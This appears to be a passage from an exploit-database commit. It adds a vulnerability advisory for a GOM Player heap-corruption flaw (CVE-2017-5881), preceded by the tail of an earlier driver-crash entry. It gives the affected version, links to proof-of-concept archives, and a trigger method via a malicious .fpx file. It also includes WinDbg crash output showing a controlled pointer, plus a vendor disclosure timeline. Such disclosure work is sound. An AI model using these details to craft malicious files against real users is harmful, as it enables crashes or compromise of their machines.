rip=fffff8035fc15b00 rsp=ffffd88179edd1a8 rbp=0000000000000080
r8=00000000020a0a08 r9=0000000000105050 r10=0000000000000000
r11=ffffb2087fe8f4f0 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
nvlddmkm+0x5e5b00:
fffff803`5fc15b00 f30f6f040a movdqu xmm0,xmmword ptr [rdx+rcx] ds:ffffb208`c12a3149=????????????????????????????????
Resetting default scope
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41365.zip

81
platforms/windows/dos/41367.txt Executable file
View file

@ -0,0 +1,81 @@
# Exploit Title: GOM Player 2.3.10.5266 - Remote heap corruption (.fpx)
# Date: 2017-02-15
# Exploit Author: Peter Baris
# Exploit link: http://www.saptech-erp.com.au/resources/PoC.zip
# Software Link: http://player.gomlab.com/download.gom?language=eng
# CVE: CVE-2017-5881
# Version: 2.3.10.5266
# Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64
POC:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41367.zip
Open the malicious fpx file with CTRL+U, served by a webserver:
WinDbg
(864.150): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=092fcde8 ebx=00000000 ecx=41414141 edx=090ff798 esi=090ff790
edi=05b10000
eip=77902fe5 esp=10a9fbb4 ebp=10a9fc94 iopl=0 nv up ei ng nz na pe
cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010287
ntdll!RtlpFreeHeap+0x4d6:
77902fe5 8b19 mov ebx,dword ptr [ecx]
ds:002b:41414141=????????
0:022> !exchain
10a9fc84: ntdll!_except_handler4+0 (77946325)
CRT scope 0, func: ntdll!RtlpFreeHeap+b7d (7795b52d)
10a9fd54: *** WARNING: Unable to verify checksum for C:\Program Files
(x86)\GRETECH\GomPlayer\gvf.ax
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Program Files (x86)\GRETECH\GomPlayer\gvf.ax -
gvf!DllGetClassObject+5801b (6e02bc7b)
10a9fdcc: gvf!DllGetClassObject+57af8 (6e02b758)
10a9fe00: gvf!DllGetClassObject+57ac8 (6e02b728)
10a9fe84: gvf!DllGetClassObject+57fe0 (6e02bc40)
10a9feac: gvf!DllGetClassObject+5d5e8 (6e031248)
10a9ff60: ntdll!_except_handler4+0 (77946325)
CRT scope 0, filter: ntdll!__RtlUserThreadStart+2e (77946608)
func: ntdll!__RtlUserThreadStart+63 (77948227)
10a9ff80: ntdll!FinalExceptionHandler+0 (779983b1)
Invalid exception stack at ffffffff
2017-02-04 notification sent to developers
2017-02-05 developerss requested information about the issue
2017-02-09 information sent with the PoC
no reply if they plan to release a fix or not